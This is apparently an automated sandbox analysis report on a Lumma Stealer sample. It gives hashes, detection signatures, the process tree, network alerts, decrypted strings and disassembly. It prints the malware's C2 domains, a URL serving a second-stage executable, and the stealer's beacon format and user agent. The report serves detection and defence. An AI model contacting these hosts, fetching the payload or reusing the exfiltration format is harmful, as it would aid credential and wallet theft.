Windows Analysis Report
XIaCqh1vRm.exe

Overview

General Information

Sample name: XIaCqh1vRm.exe (renamed because the original name is a hash value)
Original sample name: e94835b4d3d35d99400dfd68fe580197.exe
Analysis ID: 1575128
MD5: e94835b4d3d35d99400dfd68fe580197
SHA1: fd0b6060e72be90a15c8681a01cccdf7d90df179
SHA256: 1141d5ceaf0e3cddc1e1980fb60dc53e94374c6c5e43185297a7a87feb42e9b3
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • XIaCqh1vRm.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\XIaCqh1vRm.exe" MD5: E94835B4D3D35D99400DFD68FE580197)
    • 3247.tmp.exe (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\3247.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xa58:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1460:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
3.2.3247.tmp.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
3.2.3247.tmp.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
3.3.3247.tmp.exe.b30000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
3.3.3247.tmp.exe.b30000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T14:08:28.700029+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:33.255896+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:37.950634+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49754 | 104.102.49.254 | 443 | TCP
2024-12-14T14:08:31.833197+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:35.496884+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:31.833197+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:35.496884+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:33.255896+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49739 | 104.21.96.1 | 443 | TCP
2024-12-14T14:08:28.700029+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49727 | 104.21.22.222 | 443 | TCP
2024-12-14T14:08:36.072146+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 50751 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:31.890380+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 60070 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.788540+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 55952 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.645792+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 53761 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.503971+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 62009 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:27.080742+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 50695 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:26.932851+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 65123 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:36.213814+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 62987 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:35.932103+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49991 | 1.1.1.1 | 53 | UDP
2024-12-14T14:08:20.314370+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49710 | 104.21.56.70 | 443 | TCP
2024-12-14T14:08:22.125562+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49711 | 176.113.115.19 | 80 | TCP
2024-12-14T14:08:38.895332+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49754 | 104.102.49.254 | 443 | TCP

                  AV Detection

Source: XIaCqh1vRm.exe | Avira: detected
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/ | Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe | Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/z | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEQ | Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apix | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE6 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 3.3.3247.tmp.exe.b30000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz"], "Build id": "4h5VfH--"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | ReversingLabs: Detection: 42%
Source: XIaCqh1vRm.exe | Virustotal: Detection: 41%
Source: XIaCqh1vRm.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Joe Sandbox ML: detected
Source: XIaCqh1vRm.exe | Joe Sandbox ML: detected
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--

                  Compliance

Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Unpacked PE file: 0.2.XIaCqh1vRm.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Unpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack
Source: XIaCqh1vRm.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.11:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49754 version: TLS 1.2
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004389F2 FindFirstFileExW | 0_2_004389F2
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024C8C59 FindFirstFileExW | 0_2_024C8C59
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h | 3_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_00426054
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00426054
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 3_2_0040E83B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edx, ecx | 3_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 3_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_00425990
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ecx, di | 3_2_00425990
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B195
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 3_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh | 3_2_004369A0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 3_2_0041E9B0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_004299B0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 3_2_0042526A
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ebx, edi | 3_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov esi, eax | 3_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 3_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 3_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 3_2_00415298
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [eax], dx | 3_2_00415298
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0043AAB2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov eax, ebx | 3_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h | 3_2_0043CB20
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_00427326
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edi, dword ptr [esp+34h] | 3_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_0042A3D0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042C45C
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ebp, dword ptr [eax] | 3_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 3_2_00418578
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_0042750D
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx] | 3_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, edx | 3_2_0040BDC9
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 3_2_00417582
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h] | 3_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 3_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AE48
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AE24
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_00433630
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 3_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 3_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_004166A0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042ADF4
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov eax, edx | 3_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_0043BF40
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 3_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 3_2_0043A777
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 3_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 3_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0B0AF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0B08B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 3_2_00B1D0F7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 3_2_00B060F7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00B070E4
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, edx | 3_2_00AEC030
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 3_2_00AFE1E7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0B05B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_00B1B2C4
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_00B1B2C4
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_00B1B2CF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_00B1B2CF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00B1C268
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_00AED25A
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 3_2_00AED25A
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_00B063B6
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_00B1B3FC
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_00B1B2C2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_00B1B2C2
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 3_2_00B054D1
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ebx, edi | 3_2_00AFD4D7
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_00B055B3
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_00B0559D
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_00B0552B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_00AFC528
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 3_2_00AF554C
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 3_2_00B1D557
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 3_2_00B1D557
